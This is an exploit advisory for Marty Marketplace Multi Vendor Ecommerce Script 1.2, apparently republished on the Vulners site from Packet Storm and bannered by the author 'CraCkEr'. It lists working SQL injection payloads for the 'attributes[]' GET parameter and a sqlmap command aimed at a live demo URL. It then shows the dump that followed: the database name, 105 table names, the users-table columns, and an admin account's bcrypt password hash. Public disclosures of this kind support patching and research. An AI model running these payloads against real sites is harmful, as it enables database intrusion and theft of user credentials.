Vulners
Lucene search
Marty Marketplace Multi Vendor Ecommerce Script 1.2 SQL Injection
ποΈΒ 25 Jul 2022Β 00:00:00Reported byΒ CraCkErTypeΒ 
Β packetstormπΒ packetstormsecurity.comπΒ 265Β Views
`ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
ββ C r a C k E r ββ
ββ T H E C R A C K O F E T E R N A L M I G H T ββ
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
βββββ From The Ashes and Dust Rises An Unimaginable crack.... βββββ
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
ββ [ Exploits ] ββ
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
: Author : CraCkEr β β :
β Website : sangvish.com β β β
β Vendor : SangVish Technologies β β β
β Software : Marty Marketplace Multi Vendor β β Open Source Marketplace PHP script for β
β Ecommerce Script v1.2 β β eCommerce marketplace platforms β
β Vuln Type: Remote SQL Injection β β in the market β
β Method : GET β β β
β Impact : Database Access β β β
β β β β
ββββββββββββββββββββββββββββββββββββββββββββββ βββββββββββββββββββββββββββββββββββββββββββ
β B4nks-NET irc.b4nks.tk #unix ββ
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
: :
β Release Notes: β
β βββββββββββββ β
β Typically used for remotely exploitable vulnerabilities that can lead to β
β system compromise. β
β β
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
ββ ββ
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
Greets:
Phr33k , NK, GoldenX, Wehla, Cap, ZARAGAGA, DarkCatSpace, R0ot, KnG, Centerk
loool, DevS, Dark-Gost, Carlos132sp, ProGenius, bomb, fjear
CryptoJob (Twitter) twitter.com/CryptozJob
Special Greetz to The Lebanese National Basketball Team for the results of
the FIBA Asia Cup
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
ββ Β© CraCkEr 2022 ββ
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
GET parameter 'attributes[]' is vulnerable
---
Parameter: attributes[] (GET)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: attributes[]=(SELECT (CASE WHEN (6997=6997) THEN 6 ELSE (SELECT 7905 UNION SELECT 6396) END))
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: attributes[]=6 AND GTID_SUBSET(CONCAT(0x717a7a6271,(SELECT (ELT(8162=8162,1))),0x716b6a7071),8162)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: attributes[]=6 AND (SELECT 8488 FROM (SELECT(SLEEP(5)))dSkn)
---
Demo: https://demowpthemes.com/buy2marty/products?attributes%5B%5D=6
[+] Starting the Attack
sqlmap.py -u "https://demowpthemes.com/buy2marty/products?attributes%5B%5D=6" --current-db --batch
[+] fetching current database
[INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.6
[INFO] retrieved: 'garudan_buy2marty'
current database: 'garudan_buy2marty'
[+] fetching tables for database: 'garudan_buy2marty'
Database: garudan_buy2marty
[105 tables]
+----------------------------------------+
| activations |
| ads |
| ads_translations |
| audit_histories |
| categories |
| categories_translations |
| contact_replies |
| contacts |
| dashboard_widget_settings |
| dashboard_widgets |
| ec_brands |
| ec_brands_translations |
| ec_cart |
| ec_currencies |
| ec_customer_addresses |
| ec_customer_password_resets |
| ec_customers |
| ec_discount_customers |
| ec_discount_product_collections |
| ec_discount_products |
| ec_discounts |
| ec_flash_sale_products |
| ec_flash_sales |
| ec_flash_sales_translations |
| ec_grouped_products |
| ec_order_addresses |
| ec_order_histories |
| ec_order_product |
| ec_orders |
| ec_product_attribute_sets |
| ec_product_attribute_sets_translations |
| ec_product_attributes |
| ec_product_attributes_translations |
| ec_product_categories |
| ec_product_categories_translations |
| ec_product_category_product |
| ec_product_collection_products |
| ec_product_collections |
| ec_product_collections_translations |
| ec_product_cross_sale_relations |
| ec_product_label_products |
| ec_product_labels |
| ec_product_labels_translations |
| ec_product_related_relations |
| ec_product_tag_product |
| ec_product_tags |
| ec_product_tags_translations |
| ec_product_up_sale_relations |
| ec_product_variation_items |
| ec_product_variations |
| ec_product_with_attribute |
| ec_product_with_attribute_set |
| ec_products |
| ec_products_translations |
| ec_reviews |
| ec_shipment_histories |
| ec_shipments |
| ec_shipping |
| ec_shipping_rule_items |
| ec_shipping_rules |
| ec_store_locators |
| ec_taxes |
| ec_wish_lists |
| failed_jobs |
| faq_categories |
| faq_categories_translations |
| faqs |
| faqs_translations |
| jobs |
| language_meta |
| languages |
| media_files |
| media_folders |
| media_settings |
| menu_locations |
| menu_nodes |
| menus |
| meta_boxes |
| migrations |
| mp_customer_revenues |
| mp_customer_withdrawals |
| mp_stores |
| mp_vendor_info |
| newsletters |
| pages |
| pages_translations |
| password_resets |
| payments |
| post_categories |
| post_tags |
| posts |
| posts_translations |
| revisions |
| role_users |
| roles |
| settings |
| simple_slider_items |
| simple_sliders |
| slugs |
| tags |
| tags_translations |
| translations |
| user_meta |
| users |
| widgets |
+----------------------------------------+
[+] fetching columns for table 'users' in database 'garudan_buy2marty'
Database: garudan_buy2marty
Table: users
[15 columns]
+-------------------+---------------------+
| Column | Type |
+-------------------+---------------------+
| avatar_id | int(10) unsigned |
| created_at | timestamp |
| email | varchar(191) |
| email_verified_at | timestamp |
| first_name | varchar(191) |
| id | bigint(20) unsigned |
| last_login | timestamp |
| last_name | varchar(191) |
| manage_supers | tinyint(1) |
| password | varchar(191) |
| permissions | text |
| remember_token | varchar(100) |
| super_user | tinyint(1) |
| updated_at | timestamp |
| username | varchar(60) |
+-------------------+---------------------+
[+] fetching entries of column(s) 'id,password,permissions,super_user,username' for table 'users' in database 'garudan_buy2marty'
Database: garudan_buy2marty
Table: users
[1 entry]
+----+----------+--------------------------------------------------------------+------------+-------------+
| id | username | password | super_user | permissions |
+----+----------+--------------------------------------------------------------+------------+-------------+
| 1 | admin | $2y$10$XHYYo3gcYa5sUh62hgASseoSJfQae/w8KOWAW/G6qlHRri6XPRW/2 | 1 | NULL |
+----+----------+--------------------------------------------------------------+------------+-------------+
Possible algorithms: bcrypt $2*$, Blowfish (Unix)
[-] Done
`
Data
Build on a solid foundation withΒ Vulners data
WeΒ provide theΒ essential building blocks forΒ cybersecurity solutions withΒ comprehensive, structured, andΒ constantly updated vulnerability andΒ exploits data
Api
Power your application withΒ Vulners API
The Vulners REST API offers reliable, high-performance access toΒ vulnerabilityΒ intelligence, withΒ 99.9%Β SLAΒ uptime andΒ CDN-backed data delivery forΒ seamlessΒ global access
App
Assess and manage vulnerabilities withΒ VulnersΒ tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
25 Jul 2022 00:00Current
0.5Low risk
Vulners AI Score0.5